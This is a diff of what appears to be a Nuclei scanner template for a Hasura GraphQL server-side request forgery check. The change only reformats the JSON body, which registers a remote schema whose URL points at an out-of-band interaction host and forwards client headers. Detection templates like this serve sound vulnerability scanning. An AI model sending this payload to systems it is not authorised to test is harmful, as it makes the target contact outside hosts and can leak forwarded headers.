--- a/vulnerabilities/other/hasura-graphql-ssrf.yaml
+++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml
@@ -20,22 +20,24 @@ requests:
         Connection: close
 
         {
-            "type":"bulk",
-            "args":[
-            {
-            "type":"add_remote_schema",
-            "args":{
-                "name":"test",
-                "definition":{
-                "url":"https://{{interactsh-url}}",
-                "headers":[],
-                "timeout_seconds":60,
-                "forward_client_headers":true
-                }
-                }
-            }
-            ]
-            }
+           "type":"bulk",
+           "args":[
+              {
+                 "type":"add_remote_schema",
+                 "args":{
+                    "name":"test",
+                    "definition":{
+                       "url":"https://{{interactsh-url}}",
+                       "headers":[
+                          
+                       ],
+                       "timeout_seconds":60,
+                       "forward_client_headers":true
+                    }
+                 }
+              }
+           ]
+        }
 
     matchers-condition: and
     matchers:
